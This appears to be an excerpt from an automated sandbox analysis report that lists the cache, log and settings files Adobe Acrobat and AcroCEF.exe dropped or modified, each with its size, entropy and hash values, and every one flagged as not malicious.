SSDEEP: | 3:A3smtllKYe2OrLD1t/57Dek3JOVYullllollEqW3l/TjzzQ/t:A9llKzbnHR3tOVPlAmd8/ |
MD5: | FB0A8D045F73688AF992AF603E66FEC8 |
SHA1: | 84C666D242543B49B40D7D60550C02FC3C4944B0 |
SHA-256: | 06041558AA0BA5FDFF522FE3EC0D3152196F18993F9268C330D999E56D0FC0ED |
SHA-512: | 1FB86C0AFB6C9B9A456A80F3715AD23A504F82D3355008BA28C8ED72310C9297DD03ADD7CFD6A1CD1748CC8363C9EF27C6016F2A89AFFB583BF333FA531574DB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.189283020753651 |
Encrypted: | false |
SSDEEP: | 6:iOloZc9+q2PcNwi2nKuAl9OmbnIFUtHoZuJZmwpoZu9VkwOcNwi2nKuAl9OmbjLJ:7cq+vLZHAahFUtao/44V54ZHAaSJ |
MD5: | E399311C711BCBBD218860ECCBF15DD7 |
SHA1: | 78F1CCD0242F152596EE1C1B828EE40EA923E63B |
SHA-256: | 8CAF2E628185EF55996D8745812A146392382F0810263AF47603C774DB4F2C57 |
SHA-512: | 46B2BC28793C0B54B2F6F482A1DC90A17849E553AFC9F0FA84ED995BD1ED0E5EB6E4CC669B93AD18BBA18D452B09B0E64ACF6E074509A70504EBC9E4179DDFE7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.189283020753651 |
Encrypted: | false |
SSDEEP: | 6:iOloZc9+q2PcNwi2nKuAl9OmbnIFUtHoZuJZmwpoZu9VkwOcNwi2nKuAl9OmbjLJ:7cq+vLZHAahFUtao/44V54ZHAaSJ |
MD5: | E399311C711BCBBD218860ECCBF15DD7 |
SHA1: | 78F1CCD0242F152596EE1C1B828EE40EA923E63B |
SHA-256: | 8CAF2E628185EF55996D8745812A146392382F0810263AF47603C774DB4F2C57 |
SHA-512: | 46B2BC28793C0B54B2F6F482A1DC90A17849E553AFC9F0FA84ED995BD1ED0E5EB6E4CC669B93AD18BBA18D452B09B0E64ACF6E074509A70504EBC9E4179DDFE7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.183981028488794 |
Encrypted: | false |
SSDEEP: | 6:iOloZMDrQ+q2PcNwi2nKuAl9Ombzo2jMGIFUtHoZVgZmwpoZmQVkwOcNwi2nKuAv:7cCrVvLZHAa8uFUtaVg/4mI54ZHAa8RJ |
MD5: | F7D6C5D7B8BB2A4B1130AFA4EBAE314C |
SHA1: | 2BB10B5ECD62C9103A5A761EC7940B4E67DBAD1B |
SHA-256: | 20C75B5F93928F80254D5500AC4DB1BA3B579F70D9A86D75D17940673497B699 |
SHA-512: | 8DC22CA643614B12D046FA5B04AFAB919C07D4C5B7C1A541EAF70376473185CF6E3136DBE45DBB7A5328B511C129F56EA44B2AEC13908A66FE115347D0656DA3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.183981028488794 |
Encrypted: | false |
SSDEEP: | 6:iOloZMDrQ+q2PcNwi2nKuAl9Ombzo2jMGIFUtHoZVgZmwpoZmQVkwOcNwi2nKuAv:7cCrVvLZHAa8uFUtaVg/4mI54ZHAa8RJ |
MD5: | F7D6C5D7B8BB2A4B1130AFA4EBAE314C |
SHA1: | 2BB10B5ECD62C9103A5A761EC7940B4E67DBAD1B |
SHA-256: | 20C75B5F93928F80254D5500AC4DB1BA3B579F70D9A86D75D17940673497B699 |
SHA-512: | 8DC22CA643614B12D046FA5B04AFAB919C07D4C5B7C1A541EAF70376473185CF6E3136DBE45DBB7A5328B511C129F56EA44B2AEC13908A66FE115347D0656DA3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6c982cdf-b7aa-425d-ad05-693d0596adab.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.964137291603385 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqONhsBdOg2Hlgcaq3QYiubSpDyP7E4TX:Y2sRdsxydMHN3QYhbSpDa7n7 |
MD5: | AE121E04E1D36265630C750E6B095B09 |
SHA1: | DB686E11EF761BF13E6AB769E009958A6EC50C76 |
SHA-256: | C128899512A9DE08F16CF364B51A7E739ACECFCA3541BA7D4E7476002007E3AA |
SHA-512: | 484752C4C7327669D9F6A78CD8ECD7371F4103DFD25F97233ED0375D896AA5BBD7361B01A42F02AE6F9B8E70478160AFEE6DA79C54DD43023BDC09B0032E2A8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96930632548093 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4TX:Y2sRdsRdMHSOL3QYhbSpDa7n7 |
MD5: | FBDCC2772AA26D64959F72A60AEED4DF |
SHA1: | 65DC55AD8E6AF60BDBDD0E6F3BCA306D1B4706A3 |
SHA-256: | 6C648B6773C99F25E60A691E688BE640F52738A14D94F8FADC01AE9E9EF81C05 |
SHA-512: | 036D6EC84050006D1B725801BC5A70C4DAB1CFBFA5DC114D33BF66DA4BA362C4AD22E5DF5742BB5319A01434B5451162030B50828D20A72BB418824F5555D9E1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF444674.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96930632548093 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4TX:Y2sRdsRdMHSOL3QYhbSpDa7n7 |
MD5: | FBDCC2772AA26D64959F72A60AEED4DF |
SHA1: | 65DC55AD8E6AF60BDBDD0E6F3BCA306D1B4706A3 |
SHA-256: | 6C648B6773C99F25E60A691E688BE640F52738A14D94F8FADC01AE9E9EF81C05 |
SHA-512: | 036D6EC84050006D1B725801BC5A70C4DAB1CFBFA5DC114D33BF66DA4BA362C4AD22E5DF5742BB5319A01434B5451162030B50828D20A72BB418824F5555D9E1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ec12d784-be68-480b-85ea-50e7dfdf432a.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.96930632548093 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4TX:Y2sRdsRdMHSOL3QYhbSpDa7n7 |
MD5: | FBDCC2772AA26D64959F72A60AEED4DF |
SHA1: | 65DC55AD8E6AF60BDBDD0E6F3BCA306D1B4706A3 |
SHA-256: | 6C648B6773C99F25E60A691E688BE640F52738A14D94F8FADC01AE9E9EF81C05 |
SHA-512: | 036D6EC84050006D1B725801BC5A70C4DAB1CFBFA5DC114D33BF66DA4BA362C4AD22E5DF5742BB5319A01434B5451162030B50828D20A72BB418824F5555D9E1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.235649340125535 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPhvGF3:CwNw1GHqPySfkcigoO3h28ytPFGF3 |
MD5: | E6AA98A108F5EC50876BACF335638315 |
SHA1: | DAD30604442778EAB278C4A2027CB2CC8842AA09 |
SHA-256: | 6DDC7534F3D032C0DA552938C2621A2DEC963DE44D3CC5AF3F9AEF17DE843FAB |
SHA-512: | 40AF7C6DACBCDACB57AF88DE20B3C502A579B0E245B3B0E89342F6F1018F89E9DE9EE9E3B879FD5446080011E9B0A2813629B84786767428FB139219911AC321 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.197443196768483 |
Encrypted: | false |
SSDEEP: | 6:iOloBQ+q2PcNwi2nKuAl9OmbzNMxIFUtHocdgZmwpocdQVkwOcNwi2nKuAl9Ombg:7mVvLZHAa8jFUt/g/NI54ZHAa84J |
MD5: | 94C426FB6655171EED20511A29DACED5 |
SHA1: | F296411BF2DAA09618B8D5B62FA98056F6760B82 |
SHA-256: | C25E8BDD5628D6C2D8F195365533DA6F58A8E65AF997C0D5487D9EF702EB6606 |
SHA-512: | 978975860C904DFE7889307494365C4BE17D730D43F0240A9047F3016A6AD11839092B9C92693CEB40F33D0D9238C49C10D20E664BB0D0A010090AD102DA50A7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.197443196768483 |
Encrypted: | false |
SSDEEP: | 6:iOloBQ+q2PcNwi2nKuAl9OmbzNMxIFUtHocdgZmwpocdQVkwOcNwi2nKuAl9Ombg:7mVvLZHAa8jFUt/g/NI54ZHAa84J |
MD5: | 94C426FB6655171EED20511A29DACED5 |
SHA1: | F296411BF2DAA09618B8D5B62FA98056F6760B82 |
SHA-256: | C25E8BDD5628D6C2D8F195365533DA6F58A8E65AF997C0D5487D9EF702EB6606 |
SHA-512: | 978975860C904DFE7889307494365C4BE17D730D43F0240A9047F3016A6AD11839092B9C92693CEB40F33D0D9238C49C10D20E664BB0D0A010090AD102DA50A7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.439016319367013 |
Encrypted: | false |
SSDEEP: | 384:Sesci5GKiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:rqurVgazUpUTTGt |
MD5: | 0800E12DF67BF5CE8D4686E22E926CE4 |
SHA1: | 782E87CD836BE65A667665B158B75DFFCCA43310 |
SHA-256: | D49F4E2CDCC9AC937A5A4F8945ED85721D0B750C65B966A7E119A5E1B5F5DEC7 |
SHA-512: | F18474132CD9232896F2E7CC2870D1E2DBB15D961AC36E2C149A8F77CA544E203B318265DFFA53BB73257C45F13F3AF98EF442332A2778164FAFC00CF26170EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2105933847243615 |
Encrypted: | false |
SSDEEP: | 24:7+t/LHc6wK4qLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9G:7MoW4qvmFTIF3XmHjBoGGR+jMz+Lh4 |
MD5: | 6CFAA18F74A0D3099FE682D4A5F18EF5 |
SHA1: | 47AF175C83E2131FCA549BD4B2F97ADCDA345CA8 |
SHA-256: | 4ED3425E461AC3B165C02C97E3E685D425C5FA041DE580532B45834B16218868 |
SHA-512: | A585A2C9EE49404FD87F1ED044002725B83338D238AD9BA0044D19721F454D1CC5624EFCEBFE4621D47AF0E2B0E45F01E7D6AA580D4C450A6C355CF06E590ED9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.775162490582081 |
Encrypted: | false |
SSDEEP: | 3:kkFklMxpp/ltfllXlE/HT8k2+NNX8RolJuRdxLlGB9lQRYwpDdt:kKVxVeT8eNMa8RdWBwRd |
MD5: | 94FF57A17FEAA0BCA7B437F36E175A94 |
SHA1: | C5F5AE6D2CDD9F38CCFCC234EBCE5A10816A03BD |
SHA-256: | CE284BA3EC95A235358D46323FB2693CCECFC8D66C8D64826262C6A33D2DD09F |
SHA-512: | 1F1C0314BE0C290DBCD570F9884A7EE74513B1354A8CE78C20AB3B3024E8D56D3C2385494088437682FDB4AEA79AC59EA64BC205D2E234CD38C1AEEB988DC4AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.206646528609488 |
Encrypted: | false |
SSDEEP: | 6:kKdtbp/lL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HVsDImsLNkPlE99SNxAhUe/3 |
MD5: | 60A5A1B92584E81C98B122BA7B00304D |
SHA1: | A94F2E1E5EF800F30252956F3F13E8D16636F932 |
SHA-256: | A81264E1E804FE931ABDE258DC80989D97E213C902708079F2AF7213CE2BE5C6 |
SHA-512: | 48E00E16DE5817E14ACC9563B171D0D31442B26F3A21D43C85AD1CE9497212D00B6726E36787982BB423A3FBBF2E4F043BF426273018942EFB88F5A30381626F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.37770921536927 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJM3g98kUwPeUkwRe9:YvXKX/evgsdTeOknGMbLUkee9 |
MD5: | A3E0062B7DBD49D308033767464AE12F |
SHA1: | 2AB99143C542E055C969C5869C43C5D34AA66FE5 |
SHA-256: | 0AAA47D8829950DD8EE3B7CE4A86CB368797DB381515BFAB8F2376B1D46F5766 |
SHA-512: | D7C45414B449907F6A38D774C88F4997E7B06F71BE4465013896CD3CADF85633AF909807B393D92DCF7ED48270CDC6365526ED9EA8F909402A03850ED1957BFC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.3120259021657015 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfBoTfXpnrPeUkwRe9:YvXKX/evgsdTeOknGWTfXcUkee9 |
MD5: | 3AA7B1108699D2273A18729D3B4EE709 |
SHA1: | 6D1657D0FF8E0C388CB2442F20521880C13B6CC3 |
SHA-256: | F612B1DF6B23A4F48D5A4191E8F87C2D7B9A179FCFBF5B719ADB2B9B591A28DC |
SHA-512: | 5BE1750226791B349DDD8F0CB4D35185801713C687C6D00B71B632B3DDD209F035A7F190763008E5074C4F729AF6AC3FF9618602FC14267EDAB99AF4545DA1E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.290437575430563 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfBD2G6UpnrPeUkwRe9:YvXKX/evgsdTeOknGR22cUkee9 |
MD5: | 5C0B8AB98606B95BF64C4FD083F7130D |
SHA1: | 7EE58B998DC2036D2AC315D319350D9D50F0F37D |
SHA-256: | 8FEDCB44EF11669E15E7A6B4E3F51DABBED7AB871DBFB3E7EC1722DFA4CD2B7C |
SHA-512: | F845669ABB24F70E76AE21250935A6A95019970D57E1CD8546D0718B059127E555F0332AEB6EC65C27317FABDC7EECB98B93B5D7C25984F6B3DDD5D6440001AB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.365090880946966 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfPmwrPeUkwRe9:YvXKX/evgsdTeOknGH56Ukee9 |
MD5: | AD948FB12AB16BFDE4486E2FFA013FF7 |
SHA1: | AEDBFEABB8C4B3DA030FE6DE226AB2ACE5430EE3 |
SHA-256: | A18EAA20069F1046CF68064C884FC02894D23A627828C7A486258353A19ACCDC |
SHA-512: | 2796F7FE38204C2B78FD83C28D0F21E415F158572A3A9B7880C13A4766301A8BDD487811C102F3963F99EFF5632CE7EA7939AD0999853506B9EC8CA054A11285 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.68593320999694 |
Encrypted: | false |
SSDEEP: | 24:Yv6X/KgmeOkspLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvVDeehgy6SAFv5Ah8cv/U |
MD5: | 6DE3E97F39BD4FC1D4C6426D71A10ABF |
SHA1: | AD37425ED256E6091290E368FB876F41BEDE4865 |
SHA-256: | 00EB63B6679A1F4622089A9072C9970934339DC3ADC9F7973EC5111BA6CCA1CB |
SHA-512: | 106C3FD460287D2B2C92219D8EA0B6A25DCA44465C74CBCD588ED4BB6145D167D0BCDB1F89E266EA2BAAAE5E5AC0A7032DE6EFB9011F42D54699B5A58FC02147 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.299058437816946 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJf8dPeUkwRe9:YvXKX/evgsdTeOknGU8Ukee9 |
MD5: | 300CB62B035906ADD03F3BA1C7013239 |
SHA1: | 07EE3E9CD38DFDBEC5D8DB10D9BC4B311E90BEE4 |
SHA-256: | 5AC506962FE27A9E5C643411DA4F1ABA5A832FE9B4AB7077173BDE0A8D313173 |
SHA-512: | B679CAD793C8880815AD409C753A779AF98800FD5F35395BC8E5BCD67D73A9F43CB0CAABA942F724866F74AD736926276D0B3527448FD28C4AFCA24185CE053C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.302694120296721 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfQ1rPeUkwRe9:YvXKX/evgsdTeOknGY16Ukee9 |
MD5: | 37828EBAD5392AF81853809598A0B523 |
SHA1: | 49FE4EC4BD02A1914994C014DABAC7FAFFED6C97 |
SHA-256: | CF68184ADDCEBF202DCE84ED63B16E7D9D536BD49183B836A608ED953A423B61 |
SHA-512: | 305F608AA7FEBB1A4777017BA2F866C4203A694F53AA536694A03EA93C9817F34CDAF5EF18D67EB90C2B13CEBBD125FC63F28B79760953D3CC02C74042B9453C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3189740904454785 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfFldPeUkwRe9:YvXKX/evgsdTeOknGz8Ukee9 |
MD5: | FD02571E9DD000542FEEBB8DBC821975 |
SHA1: | BFBA69ED6851281C38FFF6C687648DA40647AA76 |
SHA-256: | 14B3E23836FC539A36935E66A593CBBFE6C8A7989E299E1408D21344469C4A38 |
SHA-512: | 6520000AC25265DFDEE1D7C84CFE6CB8399B22342D2B2F4BC274CD5A22F720DCD3A2B156EC8E21D2D88C8B66A02B9A3A4D201E209AA82FCF26E1D4C6B65FB1B0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.325383014154887 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfzdPeUkwRe9:YvXKX/evgsdTeOknGb8Ukee9 |
MD5: | 6982DAC6BAF041DC966A06D3409ED904 |
SHA1: | 8FEE76B358886D0B28D3B16B8A2C34F0B764EDD4 |
SHA-256: | CF103B5E1FE588897256C96C41CA3311E53CEBABE8A619A2720A59ADAB3612B5 |
